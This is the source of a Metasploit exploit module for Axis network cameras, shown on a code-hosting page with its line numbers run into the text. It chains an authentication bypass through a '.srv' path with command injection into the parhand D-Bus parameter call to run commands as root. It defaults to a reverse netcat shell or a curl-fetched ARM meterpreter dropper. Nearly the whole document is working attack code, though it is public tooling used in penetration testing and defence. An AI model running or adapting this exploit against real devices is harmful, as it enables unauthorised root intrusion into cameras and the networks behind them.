Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::CmdStager1112def initialize(info = {})13super(update_info(info,14'Name' => 'Axis Network Camera .srv-to-parhand RCE',15'Description' => %q{16This module exploits an auth bypass in .srv functionality and a17command injection in parhand to execute code as the root user.18},19'Author' => [20'Or Peles', # Vulnerability discovery (VDOO)21'wvu', # Metasploit module22'sinn3r', # Metasploit module23'Brent Cook', # Metasploit module24'Jacob Robles', # Metasploit module25'Matthew Kienow', # Metasploit module26'Shelby Pace', # Metasploit module27'Chris Lee', # Metasploit module28'Cale Black' # Metasploit module29],30'References' => [31['CVE', '2018-10660'],32['CVE', '2018-10661'],33['CVE', '2018-10662'],34['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],35['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']36],37'DisclosureDate' => '2018-06-18',38'License' => MSF_LICENSE,39'Platform' => ['unix', 'linux'],40'Arch' => [ARCH_CMD, ARCH_ARMLE],41'Privileged' => true,42'Targets' => [43['Unix In-Memory',44'Platform' => 'unix',45'Arch' => ARCH_CMD,46'Type' => :unix_memory,47'Payload' => {48'BadChars' => ' ',49'Encoder' => 'cmd/ifs',50'Compat' => {51'PayloadType' => 'cmd',52'RequiredCmd' => 'netcat-e'53}54},55'DefaultOptions' => {56'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'57}58],59['Linux Dropper',60'Platform' => 'linux',61'Arch' => ARCH_ARMLE,62'Type' => :linux_dropper,63'DefaultOptions' => {64'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'65}66]67],68'DefaultTarget' => 1,69'DefaultOptions' => {'WfsDelay' => 10}70))71end7273def check74res = send_request_cgi(75'method' => 'GET',76'uri' => "/index.html/#{rand_srv}"77)7879if res && res.code == 20480return CheckCode::Appears81end8283CheckCode::Safe84end8586def exploit87case target['Type']88when :unix_memory89execute_command(payload.encoded)90when :linux_dropper91execute_cmdstager(flavor: :curl, nospace: true)92end93end9495def execute_command(cmd, opts = {})96send_request_cgi(97'method' => 'POST',98'uri' => "/index.html/#{rand_srv}",99'vars_post' => {100'action' => 'dbus',101'args' => dbus_send(102method: :set_param,103param: "string:root.Time.DST.Enabled string:;(#{cmd})&"104)105}106)107108send_request_cgi(109'method' => 'POST',110'uri' => "/index.html/#{rand_srv}",111'vars_post' => {112'action' => 'dbus',113'args' => dbus_send(method: :synch_params)114}115)116end117118def dbus_send(method:, param: nil)119args = '--system --dest=com.axis.PolicyKitParhand ' \120'--type=method_call /com/axis/PolicyKitParhand '121122args <<123case method124when :set_param125"com.axis.PolicyKitParhand.SetParameter #{param}"126when :synch_params127'com.axis.PolicyKitParhand.SynchParameters'128end129130args131end132133def rand_srv134"#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"135end136137end138139140